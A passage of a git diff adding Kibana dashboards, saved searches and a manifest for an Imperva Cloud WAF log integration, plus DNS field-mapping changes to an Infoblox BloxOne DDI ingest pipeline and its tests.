"4eb2b76f-3066-4014-99fa-13480dc52eb0", + "w": 24, + "x": 24, + "y": 78 + }, + "panelIndex": "4eb2b76f-3066-4014-99fa-13480dc52eb0", + "title": "Top 10 URL [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6c409d07-89d2-4e87-b07e-702d25cd289a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb": { + "columnOrder": [ + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64", + "37cdfacb-63b9-427c-a43d-054b859520a8" + ], + "columns": { + "37cdfacb-63b9-427c-a43d-054b859520a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User Agent", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user_agent.original" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6c409d07-89d2-4e87-b07e-702d25cd289a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ca43cfbc-6a9c-455a-93c5-a53670f4ad64" + }, + { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8" + } + ], + "layerId": "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "0490de70-9dd6-4c32-954a-bd09449ee454", + "w": 24, + "x": 0, + "y": 93 + }, + "panelIndex": "0490de70-9dd6-4c32-954a-bd09449ee454", + "title": "Top 10 User Agent [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9534999d-5b48-4638-a917-ae394c55590e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb": { + "columnOrder": [ + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64", + "37cdfacb-63b9-427c-a43d-054b859520a8" + ], + "columns": { + "37cdfacb-63b9-427c-a43d-054b859520a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Source IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.ip" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9534999d-5b48-4638-a917-ae394c55590e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ca43cfbc-6a9c-455a-93c5-a53670f4ad64" + }, + { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8" + } + ], + "layerId": "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a", + "w": 24, + "x": 24, + "y": 93 + }, + "panelIndex": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a", + "title": "Top 10 Source IP [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 16, + "i": "6257b78c-5231-4331-96e9-1aaba70a07b4", + "w": 48, + "x": 0, + "y": 108 + }, + "panelIndex": "6257b78c-5231-4331-96e9-1aaba70a07b4", + "panelRefName": "panel_6257b78c-5231-4331-96e9-1aaba70a07b4", + "type": "search", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 19, + "i": "e20845e9-4f72-4f52-9047-513a17014667", + "w": 48, + "x": 0, + "y": 124 + }, + "panelIndex": "e20845e9-4f72-4f52-9047-513a17014667", + "panelRefName": "panel_e20845e9-4f72-4f52-9047-513a17014667", + "type": "search", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "layerListJSON": "[{\"locale\":\"autoselect\",\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"db9b4a7d-542b-4381-957a-c974443a7861\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"EMS_VECTOR_TILE\",\"color\":\"\"},\"includeInFitToBounds\":true,\"type\":\"EMS_VECTOR_TILE\"},{\"sourceDescriptor\":{\"geoField\":\"source.geo.location\",\"requestType\":\"heatmap\",\"resolution\":\"SUPER_FINE\",\"id\":\"1fd6c814-a10f-4cfc-86bf-a819167a6854\",\"type\":\"ES_GEO_GRID\",\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"metrics\":[{\"type\":\"count\"}],\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"id\":\"424c7856-db96-4063-989f-218120ea1c58\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"style\":{\"type\":\"HEATMAP\",\"colorRampName\":\"theclassic\"},\"includeInFitToBounds\":true,\"type\":\"HEATMAP\"}]", + "mapStateJSON": "{\"adHocDataViews\":[],\"zoom\":1.44,\"center\":{\"lon\":57.67286,\"lat\":41.32582},\"timeFilters\":{\"from\":\"now-15h\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":true,\"interval\":60000},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"imperva_cloud_waf.event\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"imperva_cloud_waf.event\"}},\"$state\":{\"store\":\"appState\"}}],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"customIcons\":[],\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"keydownScrollZoom\":false,\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", + "title": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[\"424c7856-db96-4063-989f-218120ea1c58\"]}" + }, + "enhancements": {}, + "hiddenLayers": [], + "hidePanelTitles": false, + "isLayerTOCOpen": false, + "mapBuffer": { + "maxLat": 85.05113, + "maxLon": 180, + "minLat": -66.51326, + "minLon": -90 + }, + "mapCenter": { + "lat": 41.32582, + "lon": 57.67286, + "zoom": 1.44 + }, + "openTOCDetails": [] + }, + "gridData": { + "h": 20, + "i": "90a17859-87de-4d61-8ed6-d5c57a797613", + "w": 48, + "x": 0, + "y": 143 + }, + "panelIndex": "90a17859-87de-4d61-8ed6-d5c57a797613", + "title": "Attack Map [Logs Imperva Cloud WAF]", + "type": "map", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs Imperva Cloud WAF] Event", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-21T10:45:45.948Z", + "id": "imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45:indexpattern-datasource-layer-ee1f5d67-a0cd-4e67-a843-ac23283cf80a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45:6ded837a-330f-4592-b843-330781c144c3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c759b864-1c05-4f5a-8a24-321a796e94c8:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c759b864-1c05-4f5a-8a24-321a796e94c8:2eb63a33-d0ba-432f-bbdb-fd39c3b36993", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "69b4961d-b2e8-49aa-b57e-18089306b583:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "69b4961d-b2e8-49aa-b57e-18089306b583:a34c0c84-35f7-485b-8aff-d9719375fa8e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a098b19a-9eeb-409e-8640-5067f86078c7:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a098b19a-9eeb-409e-8640-5067f86078c7:0ff9081a-e1a6-4342-9a95-a9918fdbec33", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ce9ebd8-844a-46ad-8814-b6c022a53559:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ce9ebd8-844a-46ad-8814-b6c022a53559:53ec5e78-b51b-4288-870d-c159b172ed5a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "486bf205-e29b-4c19-9f3f-4ff5eabb8b1e:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "486bf205-e29b-4c19-9f3f-4ff5eabb8b1e:9fb6f4c0-fb84-4502-9d1b-4adea470522a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186:indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186:eb938c68-c896-407a-ab56-2305f6b23b58", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6d748ea7-1436-40ad-800c-8e0c636740ad:indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6d748ea7-1436-40ad-800c-8e0c636740ad:43a42766-7342-4885-b71a-519aafe116cc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e840a5e-01ae-4a23-8893-f2f875b81c5c:indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e840a5e-01ae-4a23-8893-f2f875b81c5c:528c259d-3bb8-4791-8a19-a37b6624b556", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "97624fe6-c73f-4388-8c25-125eef8ff15e:indexpattern-datasource-layer-0e52361c-137e-4c14-8b62-af92a36c86ca", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "97624fe6-c73f-4388-8c25-125eef8ff15e:5bfe5e3b-12af-45dd-82eb-1213ec1fb70d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "121ba06e-38ec-4a78-8cc8-d5e592a2362c:indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "121ba06e-38ec-4a78-8cc8-d5e592a2362c:423722ed-ae37-4133-a7b7-305a907f8b96", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836:indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836:3bff65e1-141b-4e3e-8a07-16b93d6abb53", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e:indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e:8aa8e1de-41cc-47b8-b258-68aca05b397e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "561ae70e-7755-4934-96b9-f8300d0d78a2:indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "561ae70e-7755-4934-96b9-f8300d0d78a2:47dffbaa-cffc-4216-8119-6a7a56cadffd", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "282c6944-380f-44c1-9f22-4459367b204b:indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "282c6944-380f-44c1-9f22-4459367b204b:f1497cde-4c0c-40c4-9e3e-342948b78ed4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "88c0a4cb-189c-4ddb-835b-4db106ec5663:indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "88c0a4cb-189c-4ddb-835b-4db106ec5663:e255721e-3b2f-414a-bb8a-899b273c20cb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e1b971a5-c7f3-4c2c-a27c-d2a26f40a806:indexpattern-datasource-layer-d2d78c16-fd43-4762-b0f1-a60659cff9b3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e1b971a5-c7f3-4c2c-a27c-d2a26f40a806:3312999c-205a-4d09-bb15-dc5818d3e852", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4eb2b76f-3066-4014-99fa-13480dc52eb0:indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4eb2b76f-3066-4014-99fa-13480dc52eb0:78ef208b-b924-4bd2-8580-5a0deb623228", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0490de70-9dd6-4c32-954a-bd09449ee454:indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0490de70-9dd6-4c32-954a-bd09449ee454:6c409d07-89d2-4e87-b07e-702d25cd289a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a:indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a:9534999d-5b48-4638-a917-ae394c55590e", + "type": "index-pattern" + }, + { + "id": "imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773", + "name": "6257b78c-5231-4331-96e9-1aaba70a07b4:panel_6257b78c-5231-4331-96e9-1aaba70a07b4", + "type": "search" + }, + { + "id": "imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773", + "name": "e20845e9-4f72-4f52-9047-513a17014667:panel_e20845e9-4f72-4f52-9047-513a17014667", + "type": "search" + }, + { + "id": "logs-*", + "name": "90a17859-87de-4d61-8ed6-d5c57a797613:layer_1_source_index_pattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_2dccd049-7bea-48b0-ab19-7ffbbcd453f1:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5bb7309d-d7d1-41f5-9326-604454396111:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_449e7daa-7a00-4195-8844-380171d6a2ab:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/redis/kibana/search/redis-73613570-4791-11e7-be88-2ddb32f3df97.json b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773.json similarity index 72% rename from packages/redis/kibana/search/redis-73613570-4791-11e7-be88-2ddb32f3df97.json rename to packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773.json index b458ca44013..00d6fa5cd62 100644 --- a/packages/redis/kibana/search/redis-73613570-4791-11e7-be88-2ddb32f3df97.json +++ b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773.json @@ -1,13 +1,14 @@ { "attributes": { "columns": [ - "host.name", - "log.level", - "redis.log.role", - "message" + "source.user.id", + "imperva_cloud_waf.event.extensions.site.id", + "source.service.name" ], "description": "", - "hits": 0, + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -18,28 +19,27 @@ "meta": { "alias": null, "disabled": false, + "field": "data_stream.dataset", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "key": "data_stream.dataset", "negate": false, "params": { - "query": "redis.log" + "query": "imperva_cloud_waf.event" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "redis.log" + "data_stream.dataset": "imperva_cloud_waf.event" } } } ], - "highlightAll": true, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", "query": "" - }, - "version": true + } } }, "sort": [ @@ -48,12 +48,13 @@ "desc" ] ], - "title": "Logs [Logs Redis]", - "version": 1 + "timeRestore": false, + "title": "Site Essential Details [Logs Imperva Cloud WAF]", + "usesAdHocDataView": false }, "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-23T06:20:05.818Z", - "id": "redis-73613570-4791-11e7-be88-2ddb32f3df97", + "created_at": "2024-02-21T09:52:08.110Z", + "id": "imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773", "managed": true, "references": [ { @@ -65,11 +66,6 @@ "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" } ], "type": "search", diff --git a/packages/kubernetes/kibana/search/kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8.json b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773.json similarity index 54% rename from packages/kubernetes/kibana/search/kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8.json rename to packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773.json index 689683825df..f37e182ffa2 100644 --- a/packages/kubernetes/kibana/search/kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8.json +++ b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773.json @@ -1,24 +1,33 @@ { "attributes": { "columns": [ - "kubernetes.event.type", - "kubernetes.event.reason", - "kubernetes.event.involved_object.name" + "url.original", + "http.request.method", + "imperva_cloud_waf.event.extensions.device.custom_string6", + "event.action", + "source.geo.country_iso_code", + "source.ip" ], - "description": "Kubernetes Warnings", + "description": "", "grid": { "columns": { - "kubernetes.event.involved_object.kind": { - "width": 198.30555555555554 + "event.action": { + "width": 262 }, - "kubernetes.event.metadata.namespace": { - "width": 249.83333333333337 + "http.request.method": { + "width": 154 }, - "kubernetes.event.reason": { - "width": 176.33333333333331 + "imperva_cloud_waf.event.extensions.device.custom_string6": { + "width": 421 }, - "kubernetes.event.type": { - "width": 156.91666666666663 + "source.geo.country_iso_code": { + "width": 255 + }, + "source.ip": { + "width": 214 + }, + "url.original": { + "width": 284 } } }, @@ -34,17 +43,18 @@ "meta": { "alias": null, "disabled": false, + "field": "data_stream.dataset", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "kubernetes.event.type", + "key": "data_stream.dataset", "negate": false, "params": { - "query": "Warning" + "query": "imperva_cloud_waf.event" }, "type": "phrase" }, "query": { "match_phrase": { - "kubernetes.event.type": "Warning" + "data_stream.dataset": "imperva_cloud_waf.event" } } } @@ -52,11 +62,10 @@ "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.event\" " + "query": "data_stream.dataset : \"imperva_cloud_waf.event\" " } } }, - "rowHeight": -1, "sort": [ [ "@timestamp", @@ -64,26 +73,25 @@ ] ], "timeRestore": false, - "title": "Kubernetes Warnings", + "title": "Events Essential Details [Logs Imperva Cloud WAF]", "usesAdHocDataView": false }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T08:05:47.489Z", - "id": "kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8", - "migrationVersion": { - "search": "8.0.0" - }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-21T09:52:08.110Z", + "id": "imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773", + "managed": true, "references": [ { - "id": "metrics-*", + "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern" }, { - "id": "metrics-*", + "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/imperva_cloud_waf/manifest.yml b/packages/imperva_cloud_waf/manifest.yml new file mode 100644 index 00000000000..d22d498ba8a --- /dev/null +++ b/packages/imperva_cloud_waf/manifest.yml @@ -0,0 +1,37 @@ +format_version: 3.0.3 +name: imperva_cloud_waf +title: Imperva Cloud WAF +version: 0.3.0 +description: Collect logs from Imperva Cloud WAF with Elastic Agent. +type: integration +categories: + - security +conditions: + kibana: + version: ^8.12.0 + elastic: + subscription: basic +screenshots: + - src: /img/imperva-cwaf-dashboard.png + title: Imperva Cloud WAF Dashboard + size: 600x600 + type: image/png +icons: + - src: /img/imperva-logo.svg + title: Sample logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: imperva_cloud_waf + title: Imperva Cloud WAF logs + description: Collect logs from Imperva Cloud WAF instance. + inputs: + - type: aws-s3 + title: Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS + description: Collecting logs from Imperva Cloud WAF via AWS S3 or AWS SQS. + - type: cel + title: Collect Imperva Cloud WAF logs via API + description: Collecting Imperva Cloud WAF logs via API. +owner: + github: elastic/security-service-integrations + type: elastic diff --git a/packages/imperva_cloud_waf/validation.yml b/packages/imperva_cloud_waf/validation.yml new file mode 100644 index 00000000000..ddfb73e9384 --- /dev/null +++ b/packages/imperva_cloud_waf/validation.yml @@ -0,0 +1,4 @@ +errors: + exclude_checks: + - SVR00002 # Mandatory filters in dashboards. + - SVR00004 # References in dashboards. diff --git a/packages/infoblox_bloxone_ddi/changelog.yml b/packages/infoblox_bloxone_ddi/changelog.yml index f2b1c737bda..172688105d0 100644 --- a/packages/infoblox_bloxone_ddi/changelog.yml +++ b/packages/infoblox_bloxone_ddi/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "1.15.0" + changes: + - description: Map DNS fields to ECS. + type: enhancement + link: https://github.com/elastic/integrations/pull/9062 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json b/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json index aa964c3c65c..3a2584ec323 100644 --- a/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json +++ b/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json @@ -3,8 +3,18 @@ { "@timestamp": "2022-07-20T09:59:59.184Z", "dns": { - "answers": { - "ttl": 0 + "answers": [ + { + "data": "string", + "ttl": 0, + "type": "string" + } + ], + "question": { + "name": "string", + "registered_domain": "string", + "subdomain": "string", + "type": "string" } }, "ecs": { @@ -111,8 +121,18 @@ { "@timestamp": "2022-07-14T11:50:28.838Z", "dns": { - "answers": { - "ttl": 0 + "answers": [ + { + "data": "DNS rdata", + "ttl": 0, + "type": "AAAA" + } + ], + "question": { + "name": "Test name", + "registered_domain": "test Zone", + "subdomain": "Test zone", + "type": "AAAA" } }, "ecs": { @@ -200,8 +220,18 @@ { "@timestamp": "2022-07-20T09:59:59.184Z", "dns": { - "answers": { - "ttl": 0 + "answers": [ + { + "data": "DNS RData", + "ttl": 0, + "type": "DNS Data Type" + } + ], + "question": { + "name": "DNS Absolute Name", + "registered_domain": "DNS Absolute Zone Name", + "subdomain": "DNS Name in Zone", + "type": "DNS Data Type" } }, "ecs": { diff --git a/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml b/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml index 153d9a5899e..60217ed5289 100644 --- a/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml +++ b/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml @@ -370,10 +370,6 @@ processors: - append: field: error.message value: '{{{_ingest.on_failure_message}}}' - - set: - field: dns.answers.ttl - copy_from: infoblox_bloxone_ddi.dns_data.ttl - ignore_failure: true - rename: field: json.type target_field: infoblox_bloxone_ddi.dns_data.type @@ -404,6 +400,41 @@ processors: field: json.zone target_field: infoblox_bloxone_ddi.dns_data.zone ignore_missing: true + - set: + field: dns.answers.data + copy_from: infoblox_bloxone_ddi.dns_data.rdata_value + ignore_empty_value: true + - set: + field: dns.answers.ttl + copy_from: infoblox_bloxone_ddi.dns_data.ttl + ignore_empty_value: true + - set: + field: dns.answers.type + copy_from: infoblox_bloxone_ddi.dns_data.type + ignore_empty_value: true + - script: + lang: painless + if: ctx.dns?.answers != null + source: | + def a = new ArrayList(); + a.add(ctx.dns.answers); + ctx.dns.answers = a; + - set: + field: dns.question.type + copy_from: infoblox_bloxone_ddi.dns_data.type + ignore_empty_value: true + - set: + field: dns.question.name + copy_from: infoblox_bloxone_ddi.dns_data.absolute.name.spec + ignore_empty_value: true + - set: + field: dns.question.registered_domain + copy_from: infoblox_bloxone_ddi.dns_data.absolute.zone.name + ignore_empty_value: true + - set: + field: dns.question.subdomain + copy_from: infoblox_bloxone_ddi.dns_data.name_in.zone + ignore_empty_value: true - remove: field: json ignore_missing: true @@ -413,6 +444,11 @@ processors: - 